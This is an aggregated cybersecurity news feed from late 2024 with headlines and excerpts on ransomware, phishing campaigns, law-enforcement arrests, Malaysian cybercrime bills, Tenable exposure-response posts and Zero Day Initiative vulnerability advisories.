2024-12-02 21:10:00
A familiar name makes the CRN’s Women on the Rise ListThe annual CRN Women on the Rise List was posted recently. See which team member from Barracuda made the list this year.
by Barracuda
2024-12-02 20:58:33
Interpol Cyber-Fraud Action Nets More Than 5K ArrestsChalk up another win for global cooperation among law enforcement, this time targeting seven types of cyber fraud, including voice phishing and business email compromise.
by Dark Reading
2024-12-02 20:57:29
AWS Launches New Incident Response ServiceAWS Security Incident Response will help security teams defend their organizations from account takeovers, breaches, ransomware attacks, and other types of security threats.
by Dark Reading
2024-12-02 20:15:00
Sysdig and Cribl: Unleash the true power of cloud security dataCloud security operates on a different paradigm compared to traditional IT security. For example, it involves multiple contextual layers such... The post Sysdig and Cribl: Unleash the true power of cloud security data appeared first on Sysdig.
by Sysdig
2024-12-02 19:42:53
China Threat Actor Targets Individuals and Entities in Japan Via Spear Phishing CampaignResearchers at Trend Micro warn that the China-aligned threat actor Earth Kasha has launched a new spear phishing campaign targeting individuals and organizations in Japan.
by KnowBe4
2024-12-02 19:42:51
The Cruel Twist: When Fake Firing Leads to Real HackingCybercriminals are constantly evolving their tactics to exploit our vulnerabilities. A recent phishing campaign has taken this to a new low, preying on people''s fear of job loss to trick them into compromising their own security.
by KnowBe4
2024-12-02 19:41:00
NCSC boss calls for ‘sustained vigilance’ in an aggressive world
by ComputerWeekly
2024-12-02 19:41:00
A Guide to Securing AI App Development: Join This Cybersecurity WebinarArtificial Intelligence (AI) is no longer a far-off dream—it’s here, changing the way we live. From ordering coffee to diagnosing diseases, it’s everywhere. But while you’re creating the next big AI-powered app, hackers are already figuring out ways to break it. Every AI app is an opportunity—and a potential risk. The stakes are huge: data leaks, downtime, and even safety threats if security
by The Hacker News
2024-12-02 19:31:00
SmokeLoader Malware Resurfaces, Targeting Manufacturing and IT in TaiwanTaiwanese entities in manufacturing, healthcare, and information technology sectors have become the target of a new campaign distributing the SmokeLoader malware. ""SmokeLoader is well-known for its versatility and advanced evasion techniques, and its modular design allows it to perform a wide range of attacks,"" Fortinet FortiGuard Labs said in a report shared with The Hacker News. ""While
by The Hacker News
2024-12-02 19:13:41
An Apple employee is suing the company over monitoring employee personal devicesAn Apple employee sued the tech company as part of an effort to limit the visibility employers have on personal devices used for work. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-02 19:03:08
Name That Edge Toon: Shackled!Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 gift card.
by Dark Reading
2024-12-02 18:40:19
Poland arrests former spy chief in Pegasus spyware probeThe former head of Poland’s internal security agency Piotr Pogonowski was forced to appear in front of a parliamentary committee investigating the alleged abuse of Pegasus spyware in the country. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-02 18:27:56
🐝 Hive Five 200 - A Career Ending MistakeMutation XSS Explained, How to Best Start Bug Bounty to Earn $100k in 1 year, Getting started with AI: Good enough prompting, and more...
by Hive Five
2024-12-02 17:50:44
Indian online ID verification firm Signzy confirms security incidentThe Indian identity verification service, used by millions of customners, has confirmed a cybersecurity incident. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-02 17:42:32
Does Your Company Need a Virtual CISO?With cybersecurity talent hard to come by and companies increasingly looking for guidance and best practices, virtual and fractional chief information security officers can make a lot of sense.
by Dark Reading
2024-12-02 17:40:49
Russian government confirms rare criminal charges against ransomware hackerRussian media reports says that the accused hacker is on the FBI''s most wanted list. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-02 17:36:11
New Sherlocks updates: Academy recommendations, CPE credits (and more!)Ready for a more rewarding dive into your blue team investigations? Well, we have made new updates to Sherlocks that will give you momentum and a bonus to time well spent.
by Hack The Box Blog
2024-12-02 16:50:11
Industry Moves for the week of December 2, 2024 - SecurityWeekExplore industry moves and significant changes in the industry for the week of December 2, 2024. Stay updated with the latest industry trends and shifts.
by SecurityWeek
2024-12-02 16:44:00
THN Recap: Top Cybersecurity Threats, Tools and Tips (Nov 25 - Dec 1)Ever wonder what happens in the digital world every time you blink? Here''s something wild - hackers launch about 2,200 attacks every single day, which means someone''s trying to break into a system somewhere every 39 seconds. And get this - while we''re all worried about regular hackers, there are now AI systems out there that can craft phishing emails so convincingly, that even cybersecurity
by The Hacker News
2024-12-02 16:33:20
2 UK Hospitals Targeted in Separate CyberattacksAlder Hey Children''s Hospital got hit with a ransomware attack, while the nature of an incident at Wirral University Teaching Hospital remains undisclosed.
by Dark Reading
2024-12-02 16:00:00
Intro to Data Analytics Using SQLIn this video, Ethan Robish discusses the fundamentals and intricacies of data analytics using SQL. The post Intro to Data Analytics Using SQL appeared first on Black Hills Information Security.
by Black Hills Information Security
2024-12-02 15:57:00
[NEW PRODUCT]: KnowBe4’s AIDA: Revolutionizing Security Awareness Training with AI-Powered Automation and PersonalizationTechnological advances in artificial intelligence (AI) are only making the ongoing problem of social engineering worse.
by KnowBe4
2024-12-02 15:16:00
8 Million Android Users Hit by SpyLoan Malware in Loan Apps on Google PlayOver a dozen malicious Android apps identified on the Google Play Store that have been collectively downloaded over 8 million times contain malware known as SpyLoan, according to new findings from McAfee Labs. ""These PUP (potentially unwanted programs) applications use social engineering tactics to trick users into providing sensitive information and granting extra mobile app permissions, which
by The Hacker News
2024-12-02 15:00:17
Rhadamanthys Stealer Analysis for Detection OpportunitiesWritten by ARC Labs contributor, Shannon Mong Threat Overview  Binary Defense ARC Labs’ threat researchers recently dissected a Rhadamanthys Stealer infection chain to uncover detection opportunities that defenders can leverage to strengthen organizational security. In this analysis, we provide general detection guidance and actionable queries for detecting Rhadamanthys Stealer.  Recent Campaign Insights  Rhadamanthys Stealer surfaced on underground […] The post Rhadamanthys Stealer Analysis for Detection Opportunities appeared first on Binary Defense.
by Binary Defense
2024-12-02 15:00:00
Incident Response Playbooks: Are You Prepared?The playbooks that accompany your incident response plan provide efficiency and consistency in responses, help reduce downtime and dwell time, and can be a cost-saving and reputational-saving measure for your organization.
by Dark Reading
2024-12-02 14:00:00
Are You Being Tracked by an AirTag? Here’s How to CheckIf you’re worried that one of Apple’s trackers is following you without consent, try these tips.
by WIRED Security News
2024-12-02 13:40:02
BianLian's Shape-Shifting Tactics: From Encryption to Pure ExtortionIntroduction BianLian Ransomware Cyber threats are escalating in frequency and sophistication, with BianLian emerging as a significant player targeting critical sectors such as healthcare, manufacturing, and professional services. Since its emergence in 2022, BianLian has demonstrated remarkable adaptability, shifting from a double-extortion model—where data is encrypted and exfiltrated—to a data-theft extortion strategy [1]. This evolution reflects the group''s responsiveness to defensive measures and industry trends, notably following Avast''s public release of a free decryptor in January 2023, which undermined their encryption-based ransom demands.
by Picus Security
2024-12-02 13:37:48
Microsoft Boosts Device Security With Windows Resiliency InitiativeMicrosoft is readying a new release of Windows in 2025 that will have significant security controls, such as more resilient drivers and a "self-defending" operating system kernel.
by Dark Reading
2024-12-02 13:10:36
Cloud security specialist Upwind confirms it raised $100M at a $900M valuationIn November, TechCrunch broke the news that cybersecurity startup Upwind was getting a lot of inbound interest to raise money on a big valuation. Now, we can confirm that the deal is done: Upwind has closed a Series A round of $100 million. The round values it at $900 million post-money. Craft Ventures, the investment […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-02 12:48:14
Ex-NBA athlete Omri Casspi launches $60M fund targeting cybersecurity, cloud infra and AIFormer NBA athlete Omri Casspi has raised $60 million for his latest venture fund, Swish Ventures, which will invest in early-stage cybersecurity, cloud infrastructure, and AI startups. The fund plans to back 10 companies, and will invest $5 million to $7 million per deal. Swish Ventures is Casspi’s second fund following the launch of Sheva […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-02 12:38:39
Retail outages drag into second week after Blue Yonder ransomware attackA ransomware attack on supply chain software giant Blue Yonder continues to cause disruption to the company’s customers, almost two weeks after the outage first began. In a brief update to its cybersecurity incident page on Sunday, Arizona-based Blue Yonder said it is making “good progress” in its recovery from the attack, which hit its […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-02 12:37:56
Malaysia’s Fight Against Cybercrime: Two New Bills Tabled in ParliamentOverview The Madani Government has taken a significant step toward ensuring online safety by tabling two crucial bills in the Dewan Rakyat on Monday. This development marks a pivotal moment in Malaysia''s efforts to combat cybercrime and modernize outdated cyber laws that were enacted nearly three decades ago. Communications Minister Fahmi Fadzil tabled the Communications and Multimedia (Amendment) Bill 2024 and the Malaysian Communications and Multimedia Commission (Amendment) Bill 2024 for their first reading in Parliament. These legislative changes highlight the government''s determination to strengthen Malaysia’s legal framework against cybercrime while promoting a safer digital environment for its citizens. Why these new Bills are necessary The internet has evolved dramatically over the past 26 years, bringing both incredible opportunities and risks. As cyber threats become more advanced, outdated laws struggle to provide adequate protection for users, businesses, and institutions. From online scams and fraudulent activities to harassment and the misuse of personal data, the need for strong cyber laws has never been more pressing. The tabling of these two bills comes in response to rising online threats and the necessity to adapt Malaysia’s legal framework to the realities of today’s digital age. Minister Fahmi emphasized that these amendments aim to close gaps in existing legislation, ensuring that Malaysia stays ahead in its fight against cybercrime. Key Provisions in the Communications and Multimedia (Amendment) Bill 2024 The Communications and Multimedia (Amendment) Bill 2024 focuses on updating Act 588 to address new challenges in the digital realm. Below are the significant proposed changes: Expanded Definition of Harassment and Fraud Subsection 233(1) will now include the phrase “harass or commit an offense involving fraud or dishonesty against any person”, broadening the scope of punishable offenses under the act. This change ensures that fraudulent online activities, in addition to harassment, are explicitly covered under the law. Prohibition of Unsolicited Commercial Messages Clause 92 introduces a new Section 233a, which prohibits the sending of unsolicited commercial electronic messages. This measure aims to combat spam and phishing schemes, which often serve as gateways for more serious cybercrimes. Disclosure of Communications Data Clause 112 introduces Section 252b, empowering police or authorized officers to compel the disclosure of communications data from individuals in control of a communications system. This change seeks to enhance law enforcement’s ability to investigate and respond to cybercrimes swiftly. Key Provisions in the Malaysian Communications and Multimedia Commission (Amendment) Bill 2024 The Malaysian Communications and Multimedia Commission (MCMC) (Amendment) Bill 2024, meanwhile, focuses on strengthening the capabilities and functions of the MCMC under Act 589. Notable amendments include: Expansion of MCMC’s Functions Clause 5 proposes an amendment to Section 16, enabling the MCMC to review and audit information provided by licensees. This includes auditing the activities of licensees or service providers as determined by the commission, ensuring better oversight and accountability. New Definitions Clause 2 amends Section 3 to introduce new definitions for “chief executive officer” and “communications system” while also refining the definition of “chairman.” These updates provide clearer guidelines for roles and responsibilities within the MCMC. Increased Contract Value Limit Clause 13 proposes an amendment to Section 45, raising the contract value limit the commission can enter without ministerial or financial concurrence from RM5 million to RM10 million. This change is expected to streamline administrative processes and enhance the MCMC’s operational efficiency. Implications of these Bills The amendments to these two critical acts represent a comprehensive approach to tackling cybercrime. Key implications include: Enhanced Legal Protections: The laws provide stronger safeguards for individuals and businesses by explicitly addressing harassment, fraud, and spam. Modernized Oversight: Changes to the MCMC’s functions and financial thresholds will enable the commission to better regulate and oversee the telecommunications and multimedia sectors. However, some of these changes, particularly the expanded search powers, may raise concerns about privacy and potential misuse of authority. Balancing security and personal freedoms will be crucial as the bills are debated. A Critical Moment for Cybersecurity in Malaysia Minister Fahmi Fadzil expressed optimism that these amendments will be passed during the current parliamentary session, which concludes on December 12. While the journey toward a safer online environment is far from over, these bills lay a strong foundation for future advancements in Malaysia’s cybersecurity landscape. As debates ensue in Parliament, the hope is that these laws will strike a balance between strong enforcement and the protection of individual rights, paving the way for a secure and prosperous digital future. Source: https://mcmc.gov.my/skmmgovmy/media/General/pdf2/NEAP-Amendment-Notice-No-1-of-2024.pdf https://theedgemalaysia.com/node/736203https://theedgemalaysia.com/node/736160 The post Malaysia’s Fight Against Cybercrime: Two New Bills Tabled in Parliament appeared first on Cyble.
by CYBLE
2024-12-02 12:32:00
INTERPOL Arrests 5,500 in Global Cybercrime Crackdown, Seizes Over $400 MillionA global law enforcement operation has led to the arrest of more than 5,500 suspects involved in financial crimes and the seizure of more than $400 million in virtual assets and government-backed currencies. The coordinated exercise saw the participation of authorities from 40 countries, territories, and regions as part of the latest wave of Operation HAECHI-V, which took place between July and
by The Hacker News
2024-12-02 12:17:48
Attackers target sellers on message boards | Kaspersky official blogScammers on online marketplaces steal one-time codes during video calls.
by Kaspersky
2024-12-02 12:00:00
Essential components for cloud email securityTraditional email security are no longer effective against modern threats. Companies need these essential security components to fully defend their businesses.
by Barracuda
2024-12-02 12:00:00
How To Use PowerShell and WPF To Create Advanced GUIsThis video tutorial demonstrates integrating PowerShell with WPF (Windows Presentation Foundation) to create advanced graphical user interfaces (GUIs).
by ITPro Today
2024-12-02 12:00:00
Malicious Ads in Search Results Are Driving New Generations of ScamsThe scourge of “malvertising” is nothing new, but the tactic is still so effective that it''s contributing to the rise of investment scams and the spread of new strains of malware.
by WIRED Security News
2024-12-02 11:55:22
2nd December – Threat Intelligence ReportFor the latest discoveries in cyber research for the week of 2nd December, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Supply chain software provider Blue Yonder was hit by a ransomware attack, disrupting services for clients like Starbucks and UK grocery chains Morrisons and Sainsbury’s. The incident affected operations such as employee […] The post 2nd December – Threat Intelligence Report appeared first on Check Point Research.
by Check Point Research
2024-12-02 11:32:57
CISA Reveals the Top 15 Most Exploited Vulnerabilities of 2023Welcome to Picus Security''s monthly cyber threat intelligence roundup!
by Picus Security
2024-12-02 11:04:36
When password rules change, who benefits?As the National Institute of Standards and Technology rolls out updated password guidance, some experts want to make passwords a thing of the past.
by Cybersecurity Dive
2024-12-02 10:00:25
Horns&Hooves campaign delivers NetSupport RAT and BurnsRATAttackers are sending malicious scripts that download the Remote Manipulator System (RMS) build, known as BurnsRAT, and NetSupport RAT
by Securelist
2024-12-02 10:00:00
Discover the Future of IT Infrastructure at Gartner’s Las Vegas ConferenceThis year’s Gartner IT Infrastructure, Operations & Cloud Strategies Conference will explore how leaders can drive innovation in AI, cloud, and data center ops.
by ITPro Today
2024-12-02 10:00:00
What Talent Gap? Hiring Practices Are the Real ProblemWhile the need for cybersecurity talent still exists, the budget may not. Here''s how to maximize security staff despite hiring freezes.
by ITPro Today
2024-12-02 09:37:26
No company too small for Phobos ransomware gang, indictment revealsThe US indictment against an alleged Phobos ransomware kingpin reveals that no company was too small for the cybercriminal gang to hit.
by Malwarebytes Labs
2024-12-02 09:37:25
Insider Threats vs. Privacy: How IT Pros Should Tackle This DilemmaHere are strategies to safeguard sensitive data from insider threats while balancing ethical considerations.
by ITPro Today
2024-12-02 09:34:45
These cars want to know about your sex life (re-air) (Lock and Code S05E25)This week on the Lock and Code podcast, we re-air an episode from 2023 about why modern cars want to know about your sex life and a lot more.
by Malwarebytes Labs
2024-12-02 09:02:00
If You Only Have 1 Minute: Quick Tips for Effective Exposure ResponseComprehensive, action-oriented workflows and key metrics are the cornerstones of a successful exposure response program. Here’s what you need to know.In today’s fast-paced digital landscape, managing vulnerabilities is essential — but it’s about more than identifying weaknesses. Effective vulnerability management requires prioritizing and addressing risks in ways that drive security improvements and prevent major exposures. Exposure response strategies support this goal, delivering workflows that go beyond traditional risk scoring, enabling teams to prioritize vulnerabilities, set goals and track service level agreements (SLAs) by owner — ensuring a true end-to-end remediation process. Tracking progress by SLA compliance rather than by cumulative risk scores or vulnerability counts ensures accountability.The golden metrics for exposure response workflowsEffective exposure response focuses on three ""golden metrics"" that every remediation workflow should track for maximum impact:Vulnerability age: This is the age of your unresolved vulnerabilities. Mean time to remediate (MTTR): Measures how long your vulnerabilities remain open.Percentage of vulnerabilities remediated: Reflects the scope of remediation efforts and the team’s overall effectiveness.Tracking these indicators is essential for prioritizing and resolving vulnerabilities that matter most.For a deeper dive, watch the video below, where we break down each metric’s importance in exposure response workflows. Learn moreRead the blogs: If You Only Have 2 Minutes: Best Practices for Setting Exposure Response SLAsIf You Only Have 3 Minutes: Key Elements of Effective Exposure ResponseView the data sheet Exposure Response: Identify Exposures and Take Action Fast
by Tenable
2024-12-02 09:01:00
If You Only Have 2 Minutes: Best Practices for Setting Exposure Response SLAsKeeping vulnerability management efforts focused on achievable goals is key to avoiding cybersecurity team burnout. Here’s how exposure response workflows and SLAs can help.As organizations grow in the digital age, vulnerability management has become a vital cybersecurity practice. But managing vulnerabilities effectively means more than just identifying potential issues; it’s about setting priorities that align with your organization’s goals and resources. A robust exposure response program elevates this process by creating comprehensive, actionable workflows that prioritize based on real-world impact rather than just risk scores or vulnerability counts. This approach shifts vulnerability management from a reactive scramble into a proactive, sustainable strategy, driven by clear accountability and performance metrics.Exposure response workflows help teams prioritize risks based on impact and urgency. But prioritizing isn’t enough on its own — effective exposure response requires a practical approach to execution, which is where service level agreements (SLAs) make the difference.Setting the pace: How SLAs guide effective exposure responseA crucial part of exposure response is establishing SLAs. Unlike traditional methods that rely on cumulative risk scores or vulnerability counts, SLA-based workflows measure performance by individual campaigns and specific accountability metrics. This approach prevents “learned helplessness,” where constant urgency can overwhelm teams and make the workload feel insurmountable. Managing SLAs for achievable goalsSLAs help teams focus on attainable goals by defining what ‘critical’ or ‘high’ means based on your organization’s risk appetite, using Common Vulnerability Scoring System (CVSS) or Tenable Vulnerability Priority Rating (VPR) score ranges as benchmarks. This approach reduces the count of past-due critical and high vulnerabilities to zero instead of attempting to fix every issue at once — even if not every vulnerability is resolved immediately.Moreover, SLAs offer flexibility for specific needs. Industry requirements, such as Payment Card Industry Data Security Standard (PCI-DSS) compliance, may necessitate stricter SLAs for certain areas. Exposure Response in Tenable Vulnerability Management allows teams to set customized SLAs in these contexts without disrupting the overall program.Moving forward with exposure responseBy establishing realistic SLAs, teams can maintain focus and ensure that critical vulnerabilities are addressed promptly, preventing chaos and inefficiency.For a deeper dive into these concepts, check out the video below.Learn moreRead the blogs:If You Only Have 1 Minute: Quick Tips for Effective Exposure ResponseIf You Only Have 3 Minutes: Key Elements of Effective Exposure ResponseView the data sheet Exposure Response: Identify Exposures and Take Action Fast
by Tenable
2024-12-02 09:00:00
If You Only Have 3 Minutes: Key Elements of Effective Exposure ResponseLearned helplessness and lack of prioritization are two vulnerability management pitfalls cybersecurity teams face. Here’s how an exposure response program can help.In today’s complex cybersecurity landscape, effective vulnerability management is crucial. Organizations are bombarded with a staggering volume of vulnerabilities every month, and traditional methods often fall short. They tend to just identify issues without offering a sustainable way to tackle them.Enter exposure response. This approach transforms how teams prioritize, remediate and manage vulnerabilities. Instead of overwhelming teams, exposure response workflows empower them to focus on the most critical threats to their cybersecurity posture.Why should you care? Here are some common pitfalls organizations face:Learned helplessness: Teams can become paralyzed by the sheer number of vulnerabilities, leading to inaction.Emergency mode: When every vulnerability feels urgent, it becomes impossible to prioritize effectively.Exposure response workflows address these challenges head-on. By leveraging Service Level Agreements (SLAs), teams can maintain focus and drive measurable progress. This shift enhances security outcomes and fosters a resilient, sustainable cybersecurity strategy that adapts to evolving threats.Why exposure response mattersExposure response programs are essential for creating a sustainable cybersecurity strategy. By implementing exposure response workflows, teams can avoid being overwhelmed by vulnerabilities.Teams can become paralyzed by the sheer number of vulnerabilities, leading to inaction.Instead of trying to fix every issue, they can work within SLAs to prioritize and tackle what matters most, using tools like the Tenable Vulnerability Priority Rating (VPR) and the Common Vulnerability Scoring System (CVSS). This structured approach mitigates risk and empowers leaders to make data-driven decisions, enhancing their cybersecurity posture.SLAs: The foundation of effective exposure responseSLAs are tailored deadlines reflecting organizational priorities. SLA-based workflows outperform traditional methods by enabling measurement at the campaign level, providing clearer accountability. This unique approach allows organizations to compare progress internally and against industry peers, driving continuous improvement.When every vulnerability feels urgent, it becomes impossible to prioritize effectively.Setting practical SLAs helps teams focus on achievable goals, such as reducing past-due vulnerabilities rather than addressing everything at once. This targeted approach not only supports compliance but also enhances the team''s ability to manage workloads sustainably.The golden metrics: Keys to a well-functioning exposure response programTracking key metrics provides an accurate assessment of exposure response effectiveness. Three “golden metrics” serve as essential indicators:Vulnerability age: This is the age of your unresolved vulnerabilities. Shorter ages indicate rapid identification and resolution.Mean time to remediate (MTTR): Measures how long your vulnerabilities remain open.Percentage of vulnerabilities remediated: Reflects the scope of remediation efforts and the team’s overall effectiveness.When all three metrics are favorable, the exposure response program is performing well. Detailed tracking and reporting offer clear accountability and visibility into remediation efforts, reinforcing the importance of consistent progress.Moving forwardIncorporating exposure response into vulnerability management gives organizations a structured way to handle cybersecurity risks proactively. By focusing on SLAs and tracking critical metrics, organizations can maintain resilience against threats while fostering a sustainable, impactful security posture. For more insights, check out the accompanying video and other posts in this series.Learn moreRead the blogs: If You Only Have 1 Minute: Quick Tips for Effective Exposure ResponseIf You Only Have 2 Minutes: Best Practices for Setting Exposure Response SLAsView the data sheet Exposure Response: Identify Exposures and Take Action Fast
by Tenable
2024-12-02 09:00:00
The Pressure Is on for Big Tech to Regulate the Broken Digital Advertising IndustryBrands have been at the mercy of the algorithm when it comes to where their ads appear online, but they’re about to get more control.
by WIRED Security News
2024-12-02 08:07:47
A week in security (November 25 – December 1)A list of topics we covered in the week of November 25 to December 1 of 2024
by Malwarebytes Labs
2024-12-02 06:00:00
Sonicwall Firmware Deep Dive - Part 1Discover Bishop Fox in-depth analysis of SonicWall firewalls, revealing critical insights into firmware security and vulnerability.
by Bishop Fox
2024-12-02 01:50:57
The Curious Case of an Egg-Cellent ResumeKey Takeaways Private Threat Briefs: Over 20 private DFIR reports annually. Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc. All Intel: Includes everything from … Read More
by The DFIR Report
2024-12-02 00:00:00
CrowdStrike Enhances Active Directory Auditing in Falcon Identity Protection
by CrowdStrike
2024-12-02 00:00:00
CrowdStrike Falcon Prevents Multiple Vulnerable Driver Attacks in Real-World Intrusion
by CrowdStrike
2024-12-02 00:00:00
ZDI-24-1640: XnSoft XnView Classic RWZ File Parsing Integer Underflow Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of XnSoft XnView Classic. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-11950.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1639: Hewlett Packard Enterprise Insight Remote Support processAtatchmentDataStream Directory Traversal Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise Insight Remote Support. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2024-53676.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1638: Hewlett Packard Enterprise Insight Remote Support validateAgainstXSD XML External Entity Processing Information Disclosure VulnerabilityThis vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise Insight Remote Support. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-53675.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1637: Hewlett Packard Enterprise Insight Remote Support getDocumentRootElement XML External Entity Processing Information Disclosure VulnerabilityThis vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise Insight Remote Support. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-53674.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1636: Hewlett Packard Enterprise Insight Remote Support DESTA Service Deserialization of Untrusted Data Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise Insight Remote Support. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.1. The following CVEs are assigned: CVE-2024-53673.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1635: Hewlett Packard Enterprise Insight Remote Support setInputStream XML External Entity Processing Information Disclosure VulnerabilityThis vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise Insight Remote Support. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-11622.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1634: Hewlett Packard Enterprise AutoPass License Server XML External Entity Processing Information Disclosure VulnerabilityThis vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise AutoPass License Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-51770.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1633: Hewlett Packard Enterprise AutoPass License Server SQL Injection Information Disclosure VulnerabilityThis vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise AutoPass License Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-51769.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1632: Hewlett Packard Enterprise AutoPass License Server hsqldb Remote Code Execution VulnerabilityThis vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise AutoPass License Server. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 8.0. The following CVEs are assigned: CVE-2024-51768.
by Zero Day Initiative Advisories
2024-12-02 00:00:00
ZDI-24-1631: Hewlett Packard Enterprise AutoPass License Server Authentication Bypass VulnerabilityThis vulnerability allows remote attackers to bypass authentication on affected installations of Hewlett Packard Enterprise AutoPass License Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-51767.
by Zero Day Initiative Advisories
2024-11-30 15:14:11
Do Ad Overlays Ruin The Internet?The Internet is a place for connection, learning, and entertainment, but it’s been hijacked by an unwanted guest: ad overlays. These intrusive pop-ups and banners block content, disrupt browsing and often seem impossible to close. Thankfully, there are ways to take back control of your online experience. You can start by learning how to block […] The post Do Ad Overlays Ruin The Internet? appeared first on IT Security Guru.
by IT Security Guru
2024-11-30 12:44:00
Wanted Russian Hacker Linked to Hive and LockBit Ransomware ArrestedA Russian cybercriminal wanted in the U.S. in connection with LockBit and Hive ransomware operations has been arrested by law enforcement authorities in the country. According to a news report from Russian media outlet RIA Novosti, Mikhail Pavlovich Matveev has been accused of developing a malicious program designed to encrypt files and seek ransom in return for a decryption key. ""At present,
by The Hacker News
2024-11-29 22:49:22
Printer problems? Beware the bogus helpPrinter issues are very common, but searching Google for help may get you into more trouble than you''d expect.
by Malwarebytes Labs
2024-11-29 18:47:00
AI-Powered Fake News Campaign Targets Western Support for Ukraine and U.S. ElectionsA Moscow-based company sanctioned by the U.S. earlier this year has been linked to yet another influence operation designed to turn public opinion against Ukraine and erode Western support since at least December 2023. The covert campaign undertaken by Social Design Agency (SDA) leverages videos enhanced using artificial intelligence (AI) and bogus websites impersonating reputable news sources
by The Hacker News
2024-11-29 17:00:00
How AI Is Enhancing Security in RidesharingWhether it''s detecting fraudulent activity, preventing phishing, or protecting sensitive data, AI is transforming cybersecurity in ridesharing.
by Dark Reading
2024-11-29 16:30:00
Protecting Tomorrow's World: Shaping the Cyber-Physical FutureThe lines between digital and physical realms increasingly blur. While this opens countless opportunities for businesses, it also brings numerous challenges. In our recent webinar, Shaping the Cyber-Physical Future: Trends, Challenges, and Opportunities for 2025, we explored the different factors shaping the cyber-physical future. In an insightful conversation with industry experts, we discussed
by The Hacker News
2024-11-29 16:04:27
F1 Williams Racing Chooses Keeper Security to Safeguard DataEarlier this year, Keeper Security announced its sponsorship of F1 team Williams Racing. Today, the password management pros have released an in-depth case study highlighting the critical role its solutions play in safeguarding the vast amounts of data used by Williams Racing in the high-stakes world of Formula 1. As one of the most data-driven […] The post F1 Williams Racing Chooses Keeper Security to Safeguard Data appeared first on IT Security Guru.
by IT Security Guru
2024-11-29 15:36:00
Phishing-as-a-Service "Rockstar 2FA"" Targets Microsoft 365 Users with AiTM AttacksCybersecurity researchers are warning about malicious email campaigns leveraging a phishing-as-a-service (PhaaS) toolkit called Rockstar 2FA with an aim to steal Microsoft 365 account credentials. ""This campaign employs an AitM [adversary-in-the-middle] attack, allowing attackers to intercept user credentials and session cookies, which means that even users with multi-factor authentication (MFA)
by The Hacker News
2024-11-29 15:04:00
Microsoft Fixes AI, Cloud, and ERP Security Flaws; One Exploited in Active AttacksMicrosoft has addressed four security flaws impacting its artificial intelligence (AI), cloud, enterprise resource planning, and Partner Center offerings, including one that it said has been exploited in the wild. The vulnerability that has been tagged with an ""Exploitation Detected"" assessment is CVE-2024-49035 (CVSS score: 8.7), a privilege escalation flaw in partner.microsoft[.]com. ""An
by The Hacker News
2024-11-29 14:00:07
More From Our Main Blog: The Good, the Bad and the Ugly in Cybersecurity – Week 48China spy handed 4-year jail term, cloud phishing campaign targets OneDrive, and Russian APT exploits Firefox and Windows zero days. The post The Good, the Bad and the Ugly in Cybersecurity – Week 48 appeared first on SentinelOne.
by SentinelOne
2024-11-29 14:00:00
Ransomware Gangs Seek Pen Testers to Boost QualityQualified applicants must be able to test ransomware encryption and find bugs that might enable defenders to jailbreak the malware.
by Dark Reading
2024-11-29 12:02:52
Businesses and Consumers Warned To Be Wary This Black FridayIt’s that time of year again! Black Friday’s back, along with bargain deals and unprecedented amounts of online shopping. Yet, the busy shopping season brings with it significant risk for consumers and businesses alike, as cyber experts have cautioned, from increased phishing attacks to too-good-to-be-true (decoy) deals. So, how can you be sure a good […] The post Businesses and Consumers Warned To Be Wary This Black Friday appeared first on IT Security Guru.
by IT Security Guru
2024-11-29 11:01:00
